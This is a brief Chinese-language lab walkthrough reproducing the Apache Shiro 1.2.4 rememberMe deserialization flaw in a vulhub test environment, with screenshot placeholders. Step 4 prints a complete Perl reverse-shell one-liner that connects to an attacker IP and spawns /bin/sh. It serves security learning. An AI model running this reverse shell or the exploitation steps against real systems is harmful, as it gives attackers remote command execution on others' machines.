ApacheShiro反序列化漏洞

简介

Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

环境搭建

image-20210321232541614

漏洞复现

1、访问目标网站http://your-ip:8080,默认账号密码admin:vulhub

image-20210323152027309

2、输入账号密码后抓包,通过返回响应可以发现cookie信息出现rememberMe=deleteMe,可得知存在shiro漏洞。

image-20210323161548355

3、使用shiro漏洞利用工具进行命令执行,通过nc反弹shell

image-20210323171952323

4、用以下命令执行反弹linux的shell,攻击机开启监听

perl -e 'use Socket;$i="192.168.248.130";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
image-20210324151722250

最后更新于